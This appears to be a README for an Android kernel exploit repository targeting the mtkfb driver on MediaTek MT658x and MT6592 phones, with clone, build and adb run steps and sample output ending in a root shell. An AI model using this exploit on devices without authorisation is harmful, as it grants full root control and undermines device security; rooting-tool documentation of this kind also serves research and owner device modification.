MtkfbExploit@hakt0r


git clone https://hakt0r.de/MtkfbExploit/git

MtkfbExploit

mtkfb exploit for MT658x and MT6592

Build

ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk

Usage

Connect your phone via adb, then run:

adb push ./libs/armeabi/mtkfbExploit /data/local/tmp
adb shell
cd /data/local/tmp
./mtkfbExploit

If your device is vulnerable, you will see output like this:

dispif_info_addr=0xc0de9424
Spraying thread done!
Trying exp with display_id: 0x80445e61, magic_num: 0xcec1c000
1 round...
We need to get root here!
Root success!
shell@hwH30-T00:/data/local/tmp # id
uid=0(root) gid=0(root) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:kernel:s0